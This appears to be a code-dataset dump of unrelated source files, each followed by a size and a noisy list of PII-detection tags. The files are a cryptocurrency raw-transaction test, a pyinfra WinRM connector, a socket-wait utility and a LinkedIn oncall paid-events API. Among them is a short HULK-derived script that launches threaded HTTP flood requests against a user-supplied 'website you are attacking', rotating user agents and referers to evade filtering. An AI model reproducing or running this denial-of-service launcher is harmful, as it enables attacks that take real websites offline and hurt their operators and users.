rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal("0.99990000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal("0.98000000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
| 28,831 | [['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']] |
77 | from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
kwargs = {
}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
def make_names_data(hostname):
show_warning()
yield dummy@email.com(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
# Hostname can be provided via winrm config (alias), data, or the hosts name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
hostname (string): hostname of the target
command (string): actual command to execute
success_exit_codes (list): all values in the list that will return success
print_output (boolean): print the output
print_intput (boolean): print the input
return_combined_output (boolean): combine the stdout and stderr lists
shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell(default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip("'")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
if shell_executable in ['cmd']:
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String("{0}"); '
'{1} -Value $data -Encoding byte -Path "{2}"'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
# Execute run_shell_command w/sudo and/or su_user
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
| 7,847 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'winrm_port'], ['PERSON', 'winrm_transport'], ['PERSON', 'host.data.winrm_transport'], ['PERSON', 'host.data.winrm_hostname'], ['PERSON', 'host_and_port'], ['PERSON', 'TODO'], ['PERSON', 'Args'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['PERSON', 'tmp_command = command.strip'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['DATE_TIME', "1}'.format(host.print_prefix"], ['LOCATION', 'chunk_size=2048'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['URL', 'https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12'], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'host.na'], ['URL', 'logger.de'], ['URL', 'kwargs.it'], ['URL', 'kwargs.it'], ['URL', 'logger.de'], ['URL', 'Config.SH'], ['URL', 'pyinfra.api.St'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'command.st'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'host.connection.ru'], ['URL', 'host.connection.ru'], ['URL', 'response.st'], ['URL', 'logger.de'], ['URL', 'response.st'], ['URL', 'out.de'], ['URL', 'response.st'], ['URL', 'err.de'], ['URL', 'logger.de'], ['URL', 'logger.de'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'io.re'], ['URL', 'System.Co'], ['URL', 'logger.er'], ['URL', 'ntpath.jo'], ['URL', 'logger.er'], ['URL', 'click.ec'], ['URL', 'host.pr']] |
78 | #
# (C) Copyright 2011 Jacek Konieczny dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
"""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output."""
from __future__ import absolute_import, division
__docformat__ = "restructuredtext en"
import select
if hasattr(select, "poll"):
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
| 2,121 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2011'], ['PERSON', 'Jacek Konieczny'], ['LOCATION', 'Mass Ave'], ['LOCATION', 'Cambridge'], ['LOCATION', 'MA 02139'], ['LOCATION', 'USA'], ['URL', 'email.com'], ['URL', 'poll.re'], ['URL', 'poll.re'], ['URL', 'select.se'], ['URL', 'select.se']] |
79 | """
HTTP UNBEARBALE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY
"""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit("Provide -w or --website.")
userAgents = \
(
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \
'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = \
(
'http://www.google.com/?q=', \
'http://www.usatoday.com/search/results?q=', \
'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
| 2,175 | [['LOCATION', "help='Choose"], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['LOCATION', 'US'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['URL', 't1.st'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '4.0.219.6'], ['DATE_TIME', '1.1.4322'], ['DATE_TIME', '2.5.22'], ['URL', "http://www.google.com/?q=',"], ['URL', "http://www.usatoday.com/search/results?q=',"], ['URL', "http://engadget.search.aol.com/search?q='"], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'systemArguments.th'], ['URL', 'random.ch'], ['URL', 'random.ch'], ['URL', 'hulqRequest.ht']] |
80 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
"""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"ldap_user_id":
[
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": null,
"schedule_id": null,
"role": "primary",
"user": "foo",
"full_name": "Foo Icecream",
"id": 187795
},
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": "PI:KEY",
"schedule_id": 123,
"role": "primary",
"user": "bar",
"full_name": "Bar Apple",
"id": 187795
}
]
]
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
"""
config = self.config
oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
# fetch team data from an externall oncall-bonus api
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
# check if event's role is payed for that team
team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
if team_payment_details:
team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
if team_payed_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
